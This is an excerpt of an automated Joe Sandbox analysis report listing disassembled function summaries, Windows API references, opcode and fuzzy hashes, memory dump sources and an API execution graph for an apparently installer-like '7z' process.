                                • Opcode Fuzzy Hash: 38d5f30d07a27ab72b3019f36445ad2f1ddd300a59225253cba905e3d677750f
                                • Instruction Fuzzy Hash: F531C832204A4591CF20DF26E45139D6720E7857ADF845327EE6E476A9EF3CC69AC704
                                Function 0042EB88 Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 0042EBA3
                                • LeaveCriticalSection.KERNEL32 ref: 0042EBAF
                                • EnterCriticalSection.KERNEL32 ref: 0042EC43
                                • LeaveCriticalSection.KERNEL32 ref: 0042EC4F
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave
                                • String ID:
                                • API String ID: 3168844106-0
                                • Opcode ID: e3da21429a98c917f99eba1a7ae18c4b33130e4024c0b284e560039400f1db44
                                • Instruction ID: fb6b838804ebb24256f3d4188e315621a1322c00dbdf2a2671d7216d24a1bb0e
                                • Opcode Fuzzy Hash: e3da21429a98c917f99eba1a7ae18c4b33130e4024c0b284e560039400f1db44
                                • Instruction Fuzzy Hash: 5F211276304B9497CB20AF2AE98025D3370FB49B98F985122DF4E47B10DF38D8A5C708
                                Function 0044D024 Relevance: 5.1, APIs: 4, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                • free.MSVCRT ref: 0044D0B2
                                • free.MSVCRT ref: 0044D0BC
                                • free.MSVCRT ref: 0044D0C6
                                • free.MSVCRT ref: 0044D0D0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$mallocmemmove
                                • String ID:
                                • API String ID: 1702027931-0
                                • Opcode ID: aa46361b346179c8ba0ad219260d330762df1e69ca11c891639b6e6eac9016d5
                                • Instruction ID: 76a85c5cdf26fd2b16367a0e14e4148c4ddfe1241db4b9289ece7004c4c408b0
                                • Opcode Fuzzy Hash: aa46361b346179c8ba0ad219260d330762df1e69ca11c891639b6e6eac9016d5
                                • Instruction Fuzzy Hash: 0A218EB2601B8482DB20DF35E58025D33A5F788B98F20822A9F9D47768DF3CC8A6C744
                                Function 00438930 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 0ada6d7585ae9709d98b08fbd08e01cd3c63d5cd0dc02f0aeaf66522c8f6043c
                                • Instruction ID: e5f339679e4b3969f3e217930036a0cc08e62d723978291537c9df323d642819
                                • Opcode Fuzzy Hash: 0ada6d7585ae9709d98b08fbd08e01cd3c63d5cd0dc02f0aeaf66522c8f6043c
                                • Instruction Fuzzy Hash: 0911B9A330474486DB709736E54036EA760AB9D7E8F04132AAF9E87B51DF6CC986C709
                                Function 0044B6CC Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: f196707fa33a710a6e46a40aea969b5deca21029894ce235fc118b4c4d1c3aaf
                                • Instruction ID: 2b880e5eb00f3c14c2f29568aba4d3fca289750a396a43ea587bb8952cb612cf
                                • Opcode Fuzzy Hash: f196707fa33a710a6e46a40aea969b5deca21029894ce235fc118b4c4d1c3aaf
                                • Instruction Fuzzy Hash: F701CCB631574941FB049B2B9D403A833659B5AFD8F888026CE088B315FF7CC956D34D
                                Function 00466A08 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: d06369ecdc28b0a705b8f5a78abc2d88ad771fd5d20fed5fb0d2dce4f68be1b8
                                • Instruction ID: 29c0094a89695976eb68b81a0604a8bc81d649539695bcef49ff71ca8b39bcc5
                                • Opcode Fuzzy Hash: d06369ecdc28b0a705b8f5a78abc2d88ad771fd5d20fed5fb0d2dce4f68be1b8
                                • Instruction Fuzzy Hash: 3001C0B235574551EB049F6B9D403B433659B1AFC4F8580268E0997305FF3CC952D30E
                                Function 00415FB0 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 813d90adbe70e94906d70a422908a3570b15f95030edf62c32f227ae548bc4b6
                                • Instruction ID: 7abc871675b1fbb0784ed229d1a5a560f77a2ecac766dd362fcede12932176db
                                • Opcode Fuzzy Hash: 813d90adbe70e94906d70a422908a3570b15f95030edf62c32f227ae548bc4b6
                                • Instruction Fuzzy Hash: 9901B573350E8D819621FD67A9905AB6714AB45BE971D421BEE284B340DF7DC8D38304
                                Function 00439930 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                                • Instruction ID: 6dfca412cdb9b0eb315246fdb34be5c7488d4f5ffe71866d61bb7ae80e66f610
                                • Opcode Fuzzy Hash: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                                • Instruction Fuzzy Hash: 6CF0BB6374164D498710AE37E9901AD53109F59BE8B5C023AEF1D4B344DEA8CCD38344
                                Function 00438E64 Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                                • Instruction ID: 50d66862441bc0142143edf188d56c0d2e8234cc1b5f6a13b875817ff461cc2d
                                • Opcode Fuzzy Hash: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                                • Instruction Fuzzy Hash: F1F0B423741A4886C711AE37E9411AD53209BC9FD9B1C422BAE2D9F354DE7CCC928304
                                Function 004403CC Relevance: 5.0, APIs: 4, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                                • Instruction ID: afae9fd7ca4b035aa6fd483acd4c2d7952c43c110deaac60b60c544d20524c6c
                                • Opcode Fuzzy Hash: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                                • Instruction Fuzzy Hash: 03D0422268050E82CB14AB77E9A20AC13209B99F887541216AE2EDF215CD5CCCE38388

                                Execution Graph

                                Execution Coverage:34.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10%
                                Total number of Nodes:1344
                                Total number of Limit Nodes:42
                                execution_graph 2913 4015c1 2932 402da6 2913->2932 2917 401631 2919 401663 2917->2919 2920 401636 2917->2920 2922 401423 24 API calls 2919->2922 2956 401423 2920->2956 2929 40165b 2922->2929 2927 40164a SetCurrentDirectoryW 2927->2929 2928 401617 GetFileAttributesW 2930 4015d1 2928->2930 2930->2917 2930->2928 2944 405e39 2930->2944 2948 405b08 2930->2948 2951 405a6e CreateDirectoryW 2930->2951 2960 405aeb CreateDirectoryW 2930->2960 2933 402db2 2932->2933 2963 40657a 2933->2963 2936 4015c8 2938 405eb7 CharNextW CharNextW 2936->2938 2939 405ed4 2938->2939 2942 405ee6 2938->2942 2941 405ee1 CharNextW 2939->2941 2939->2942 2940 405f0a 2940->2930 2941->2940 2942->2940 2943 405e39 CharNextW 2942->2943 2943->2942 2945 405e3f 2944->2945 2946 405e55 2945->2946 2947 405e46 CharNextW 2945->2947 2946->2930 2947->2945 3001 40690a GetModuleHandleA 2948->3001 2952 405abb 2951->2952 2953 405abf GetLastError 2951->2953 2952->2930 2953->2952 2954 405ace SetFileSecurityW 2953->2954 2954->2952 2955 405ae4 GetLastError 2954->2955 2955->2952 3010 40559f 2956->3010 2959 40653d lstrcpynW 2959->2927 2961 405afb 2960->2961 2962 405aff GetLastError 2960->2962 2961->2930 2962->2961 2967 406587 2963->2967 2964 4067aa 2965 402dd3 2964->2965 2996 40653d lstrcpynW 2964->2996 2965->2936 2980 4067c4 2965->2980 2967->2964 2968 406778 lstrlenW 2967->2968 2971 40657a 10 API calls 2967->2971 2972 40668f GetSystemDirectoryW 2967->2972 2974 4066a2 GetWindowsDirectoryW 2967->2974 2975 406719 lstrcatW 2967->2975 2976 40657a 10 API calls 2967->2976 2977 4067c4 5 API calls 2967->2977 2978 4066d1 SHGetSpecialFolderLocation 2967->2978 2989 40640b 2967->2989 2994 406484 wsprintfW 2967->2994 2995 40653d lstrcpynW 2967->2995 2968->2967 2971->2968 2972->2967 2974->2967 2975->2967 2976->2967 2977->2967 2978->2967 2979 4066e9 SHGetPathFromIDListW CoTaskMemFree 2978->2979 2979->2967 2986 4067d1 2980->2986 2981 406847 2982 40684c CharPrevW 2981->2982 2984 40686d 2981->2984 2982->2981 2983 40683a CharNextW 2983->2981 2983->2986 2984->2936 2985 405e39 CharNextW 2985->2986 2986->2981 2986->2983 2986->2985 2987 406826 CharNextW 2986->2987 2988 406835 CharNextW 2986->2988 2987->2986 2988->2983 2997 4063aa 2989->2997 2992 40646f 2992->2967 2993 40643f RegQueryValueExW RegCloseKey 2993->2992 2994->2967 2995->2967 2996->2965 2998 4063b9 2997->2998 2999 4063c2 RegOpenKeyExW 2998->2999 3000 4063bd 2998->3000 2999->3000 3000->2992 3000->2993 3002 406930 GetProcAddress 3001->3002 3003 406926 3001->3003 3005 405b0f 3002->3005 3007 40689a GetSystemDirectoryW 3003->3007 3005->2930 3006 40692c 3006->3002 3006->3005 3008 4068bc wsprintfW LoadLibraryExW 3007->3008 3008->3006 3011 4055ba 3010->3011 3020 401431 3010->3020 3012 4055d6 lstrlenW 3011->3012 3013 40657a 17 API calls 3011->3013 3014 4055e4 lstrlenW 3012->3014 3015 4055ff 3012->3015 3013->3012 3016 4055f6 lstrcatW 3014->3016 3014->3020 3017 405612 3015->3017 3018 405605 SetWindowTextW 3015->3018 3016->3015 3019 405618 SendMessageW SendMessageW SendMessageW 3017->3019 3017->3020 3018->3017 3019->3020 3020->2959 3021 401941 3022 401943 3021->3022 3023 402da6 17 API calls 3022->3023 3024 401948 3023->3024 3027 405c49 3024->3027 3063 405f14 3027->3063 3030 405c71 DeleteFileW 3061 401951 3030->3061 3031 405c88 3032 405da8 3031->3032 3077 40653d lstrcpynW 3031->3077 3032->3061 3095 406873 FindFirstFileW 3032->3095 3034 405cae 3035 405cc1 3034->3035 3036 405cb4 lstrcatW 3034->3036 3078 405e58 lstrlenW 3035->3078 3038 405cc7 3036->3038 3040 405cd7 lstrcatW 3038->3040 3042 405ce2 lstrlenW FindFirstFileW 3038->3042 3040->3042 3042->3032 3054 405d04 3042->3054 3045 405d8b FindNextFileW 3049 405da1 FindClose 3045->3049 3045->3054 3046 405c01 5 API calls 3048 405de3 3046->3048 3050 405de7 3048->3050 3051 405dfd 3048->3051 3049->3032 3055 40559f 24 API calls 3050->3055 3050->3061 3053 40559f 24 API calls 3051->3053 3053->3061 3054->3045 3056 405c49 60 API calls 3054->3056 3058 40559f 24 API calls 3054->3058 3060 40559f 24 API calls 3054->3060 3082 40653d lstrcpynW 3054->3082 3083 405c01 3054->3083 3091 4062fd MoveFileExW 3054->3091 3057 405df4 3055->3057 3056->3054 3059 4062fd 36 API calls 3057->3059 3058->3045 3059->3061 3060->3054 3101 40653d lstrcpynW 3063->3101 3065 405f25 3066 405eb7 4 API calls 3065->3066 3067 405f2b 3066->3067 3068 405c69 3067->3068 3069 4067c4 5 API calls 3067->3069 3068->3030 3068->3031 3075 405f3b 3069->3075 3070 405f6c lstrlenW 3071 405f77 3070->3071 3070->3075 3073 405e0c 3 API calls 3071->3073 3072 406873 2 API calls 3072->3075 3074 405f7c GetFileAttributesW 3073->3074 3074->3068 3075->3068 3075->3070 3075->3072 3076 405e58 2 API calls 3075->3076 3076->3070 3077->3034 3079 405e66 3078->3079 3080 405e78 3079->3080 3081 405e6c CharPrevW 3079->3081 3080->3038 3081->3079 3081->3080 3082->3054 3102 406008 GetFileAttributesW 3083->3102 3086 405c2e 3086->3054 3087 405c24 DeleteFileW 3089 405c2a 3087->3089 3088 405c1c RemoveDirectoryW 3088->3089 3089->3086 3090 405c3a SetFileAttributesW 3089->3090 3090->3086 3092 40631e 3091->3092 3093 406311 3091->3093 3092->3054 3105 406183 3093->3105 3096 405dcd 3095->3096 3097 406889 FindClose 3095->3097 3096->3061 3098 405e0c lstrlenW CharPrevW 3096->3098 3097->3096 3099 405dd7 3098->3099 3100 405e28 lstrcatW 3098->3100 3099->3046 3100->3099 3101->3065 3103 405c0d 3102->3103 3104 40601a SetFileAttributesW 3102->3104 3103->3086 3103->3087 3103->3088 3104->3103 3106 4061b3 3105->3106 3107 4061d9 GetShortPathNameW 3105->3107 3132 40602d GetFileAttributesW CreateFileW 3106->3132 3108 4062f8 3107->3108 3109 4061ee 3107->3109 3108->3092 3109->3108 3112 4061f6 wsprintfA 3109->3112 3111 4061bd CloseHandle GetShortPathNameW 3111->3108 3113 4061d1 3111->3113 3114 40657a 17 API calls 3112->3114 3113->3107 3113->3108 3115 40621e 3114->3115 3133 40602d GetFileAttributesW CreateFileW 3115->3133 3117 40622b 3117->3108 3118 40623a GetFileSize GlobalAlloc 3117->3118 3119 4062f1 CloseHandle 3118->3119 3120 40625c 3118->3120 3119->3108 3134 4060b0 ReadFile 3120->3134 3125 40627b lstrcpyA 3128 40629d 3125->3128 3126 40628f 3127 405f92 4 API calls 3126->3127 3127->3128 3129 4062d4 SetFilePointer 3128->3129 3141 4060df WriteFile 3129->3141 3132->3111 3133->3117 3135 4060ce 3134->3135 3135->3119 3136 405f92 lstrlenA 3135->3136 3137 405fd3 lstrlenA 3136->3137 3138 405fdb 3137->3138 3139 405fac lstrcmpiA 3137->3139 3138->3125 3138->3126 3139->3138 3140 405fca CharNextA 3139->3140 3140->3137 3142 4060fd GlobalFree 3141->3142 3142->3119 3143 401c43 3165 402d84 3143->3165 3145 401c4a 3146 402d84 17 API calls 3145->3146 3147 401c57 3146->3147 3148 401c6c 3147->3148 3149 402da6 17 API calls 3147->3149 3150 401c7c 3148->3150 3151 402da6 17 API calls 3148->3151 3149->3148 3152 401cd3 3150->3152 3153 401c87 3150->3153 3151->3150 3155 402da6 17 API calls 3152->3155 3154 402d84 17 API calls 3153->3154 3157 401c8c 3154->3157 3156 401cd8 3155->3156 3158 402da6 17 API calls 3156->3158 3159 402d84 17 API calls 3157->3159 3160 401ce1 FindWindowExW 3158->3160 3161 401c98 3159->3161 3164 401d03 3160->3164 3162 401cc3 SendMessageW 3161->3162 3163 401ca5 SendMessageTimeoutW 3161->3163 3162->3164 3163->3164 3166 40657a 17 API calls 3165->3166 3167 402d99 3166->3167 3167->3145 3975 404943 3976 404953 3975->3976 3977 404979 3975->3977 3978 404499 18 API calls 3976->3978 3979 404500 8 API calls 3977->3979 3980 404960 SetDlgItemTextW 3978->3980 3981 404985 3979->3981 3980->3977 3982 4028c4 3983 4028ca 3982->3983 3984 4028d2 FindClose 3983->3984 3985 402c2a 3983->3985 3984->3985 3989 4016cc 3990 402da6 17 API calls 3989->3990 3991 4016d2 GetFullPathNameW 3990->3991 3992 4016ec 3991->3992 3998 40170e 3991->3998 3995 406873 2 API calls 3992->3995 3992->3998 3993 401723 GetShortPathNameW 3994 402c2a 3993->3994 3996 4016fe 3995->3996 3996->3998 3999 40653d lstrcpynW 3996->3999 3998->3993 3998->3994 3999->3998 4000 401e4e GetDC 4001 402d84 17 API calls 4000->4001 4002 401e60 GetDeviceCaps MulDiv ReleaseDC 4001->4002 4003 402d84 17 API calls 4002->4003 4004 401e91 4003->4004 4005 40657a 17 API calls 4004->4005 4006 401ece CreateFontIndirectW 4005->4006 4007 402638 4006->4007 4008 4045cf lstrcpynW lstrlenW 3675 402950 3676 402da6 17 API calls 3675->3676 3678 40295c 3676->3678 3677 402972 3680 406008 2 API calls 3677->3680 3678->3677 3679 402da6 17 API calls 3678->3679 3679->3677 3681 402978 3680->3681 3703 40602d GetFileAttributesW CreateFileW 3681->3703 3683 402985 3684 402a3b 3683->3684 3685 4029a0 GlobalAlloc 3683->3685 3686 402a23 3683->3686 3687 402a42 DeleteFileW 3684->3687 3688 402a55 3684->3688 3685->3686 3689 4029b9 3685->3689 3690 4032b4 31 API calls 3686->3690 3687->3688 3704 4034e5 SetFilePointer 3689->3704 3692 402a30 CloseHandle 3690->3692 3692->3684 3693 4029bf 3694 4034cf ReadFile 3693->3694 3695 4029c8 GlobalAlloc 3694->3695 3696 4029d8 3695->3696 3697 402a0c 3695->3697 3698 4032b4 31 API calls 3696->3698 3699 4060df WriteFile 3697->3699 3702 4029e5 3698->3702 3700 402a18 GlobalFree 3699->3700 3700->3686 3701 402a03 GlobalFree 3701->3697 3702->3701 3703->3683 3704->3693 4009 401956 4010 402da6 17 API calls 4009->4010 4011 40195d lstrlenW 4010->4011 4012 402638 4011->4012 3769 4014d7 3770 402d84 17 API calls 3769->3770 3771 4014dd Sleep 3770->3771 3773 402c2a 3771->3773 3774 4020d8 3775 4020ea 3774->3775 3785 40219c 3774->3785 3776 402da6 17 API calls 3775->3776 3778 4020f1 3776->3778 3777 401423 24 API calls 3783 4022f6 3777->3783 3779 402da6 17 API calls 3778->3779 3780 4020fa 3779->3780 3781 402110 LoadLibraryExW 3780->3781 3782 402102 GetModuleHandleW 3780->3782 3784 402121 3781->3784 3781->3785 3782->3781 3782->3784 3796 406979 3784->3796 3785->3777 3788 402132 3791 402151 KiUserCallbackDispatcher 3788->3791 3792 40213a 3788->3792 3789 40216b 3790 40559f 24 API calls 3789->3790 3794 402142 3790->3794 3791->3794 3793 401423 24 API calls 3792->3793 3793->3794 3794->3783 3795 40218e FreeLibrary 3794->3795 3795->3783 3801 40655f WideCharToMultiByte 3796->3801 3798 406996 3799 40699d GetProcAddress 3798->3799 3800 40212c 3798->3800 3799->3800 3800->3788 3800->3789 3801->3798 4013 404658 4014 404670 4013->4014 4020 40478a 4013->4020 4021 404499 18 API calls 4014->4021 4015 4047f4 4016 4048be 4015->4016 4017 4047fe GetDlgItem 4015->4017 4022 404500 8 API calls 4016->4022 4018 404818 4017->4018 4019 40487f 4017->4019 4018->4019 4026 40483e SendMessageW LoadCursorW SetCursor 4018->4026 4019->4016 4027 404891 4019->4027 4020->4015 4020->4016 4023 4047c5 GetDlgItem SendMessageW 4020->4023 4024 4046d7 4021->4024 4025 4048b9 4022->4025 4046 4044bb KiUserCallbackDispatcher 4023->4046 4029 404499 18 API calls 4024->4029 4050 404907 4026->4050 4032 4048a7 4027->4032 4033 404897 SendMessageW 4027->4033 4030 4046e4 CheckDlgButton 4029->4030 4044 4044bb KiUserCallbackDispatcher 4030->4044 4032->4025 4037 4048ad SendMessageW 4032->4037 4033->4032 4034 4047ef 4047 4048e3 4034->4047 4037->4025 4039 404702 GetDlgItem 4045 4044ce SendMessageW 4039->4045 4041 404718 SendMessageW 4042 404735 GetSysColor 4041->4042 4043 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4041->4043 4042->4043 4043->4025 4044->4039 4045->4041 4046->4034 4048 4048f1 4047->4048 4049 4048f6 SendMessageW 4047->4049 4048->4049 4049->4015 4053 405b63 ShellExecuteExW 4050->4053 4052 40486d LoadCursorW SetCursor 4052->4019 4053->4052 4054 402b59 4055 402b60 4054->4055 4056 402bab 4054->4056 4059 402d84 17 API calls 4055->4059 4062 402ba9 4055->4062 4057 40690a 5 API calls 4056->4057 4058 402bb2 4057->4058 4060 402da6 17 API calls 4058->4060 4061 402b6e 4059->4061 4063 402bbb 4060->4063 4064 402d84 17 API calls 4061->4064 4063->4062 4065 402bbf IIDFromString 4063->4065 4067 402b7a 4064->4067 4065->4062 4066 402bce 4065->4066 4066->4062 4072 40653d lstrcpynW 4066->4072 4071 406484 wsprintfW 4067->4071 4070 402beb CoTaskMemFree 4070->4062 4071->4062 4072->4070 3902 40175c 3903 402da6 17 API calls 3902->3903 3904 401763 3903->3904 3905 40605c 2 API calls 3904->3905 3906 40176a 3905->3906 3907 40605c 2 API calls 3906->3907 3907->3906 4073 401d5d 4074 402d84 17 API calls 4073->4074 4075 401d6e SetWindowLongW 4074->4075 4076 402c2a 4075->4076 3908 4028de 3909 4028e6 3908->3909 3910 4028ea FindNextFileW 3909->3910 3913 4028fc 3909->3913 3911 402943 3910->3911 3910->3913 3914 40653d lstrcpynW 3911->3914 3914->3913 3915 4056de 3916 405888 3915->3916 3917 4056ff GetDlgItem GetDlgItem GetDlgItem 3915->3917 3919 405891 GetDlgItem CreateThread CloseHandle 3916->3919 3920 4058b9 3916->3920 3960 4044ce SendMessageW 3917->3960 3919->3920 3963 405672 5 API calls 3919->3963 3922 4058e4 3920->3922 3923 4058d0 ShowWindow ShowWindow 3920->3923 3924 405909 3920->3924 3921 40576f 3929 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3921->3929 3925 405944 3922->3925 3926 4058f8 3922->3926 3927 40591e ShowWindow 3922->3927 3962 4044ce SendMessageW 3923->3962 3928 404500 8 API calls 3924->3928 3925->3924 3937 405952 SendMessageW 3925->3937 3931 404472 SendMessageW 3926->3931 3933 405930 3927->3933 3934 40593e 3927->3934 3932 405917 3928->3932 3935 4057e4 3929->3935 3936 4057c8 SendMessageW SendMessageW 3929->3936 3931->3924 3938 40559f 24 API calls 3933->3938 3939 404472 SendMessageW 3934->3939 3940 4057f7 3935->3940 3941 4057e9 SendMessageW 3935->3941 3936->3935 3937->3932 3942 40596b CreatePopupMenu 3937->3942 3938->3934 3939->3925 3944 404499 18 API calls 3940->3944 3941->3940 3943 40657a 17 API calls 3942->3943 3946 40597b AppendMenuW 3943->3946 3945 405807 3944->3945 3949 405810 ShowWindow 3945->3949 3950 405844 GetDlgItem SendMessageW 3945->3950 3947 405998 GetWindowRect 3946->3947 3948 4059ab TrackPopupMenu 3946->3948 3947->3948 3948->3932 3951 4059c6 3948->3951 3952 405833 3949->3952 3953 405826 ShowWindow 3949->3953 3950->3932 3954 40586b SendMessageW SendMessageW 3950->3954 3955 4059e2 SendMessageW 3951->3955 3961 4044ce SendMessageW 3952->3961 3953->3952 3954->3932 3955->3955 3956 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3955->3956 3958 405a24 SendMessageW 3956->3958 3958->3958 3959 405a4d GlobalUnlock SetClipboardData CloseClipboard 3958->3959 3959->3932 3960->3921 3961->3950 3962->3922 4077 404ce0 4078 404cf0 4077->4078 4079 404d0c 4077->4079 4088 405b81 GetDlgItemTextW 4078->4088 4081 404d12 SHGetPathFromIDListW 4079->4081 4082 404d3f 4079->4082 4084 404d22 4081->4084 4087 404d29 SendMessageW 4081->4087 4083 404cfd SendMessageW 4083->4079 4085 40140b 2 API calls 4084->4085 4085->4087 4087->4082 4088->4083 4089 401563 4090 402ba4 4089->4090 4093 406484 wsprintfW 4090->4093 4092 402ba9 4093->4092 4094 401968 4095 402d84 17 API calls 4094->4095 4096 40196f 4095->4096 4097 402d84 17 API calls 4096->4097 4098 40197c 4097->4098 4099 402da6 17 API calls 4098->4099 4100 401993 lstrlenW 4099->4100 4101 4019a4 4100->4101 4105 4019e5 4101->4105 4106 40653d lstrcpynW 4101->4106 4103 4019d5 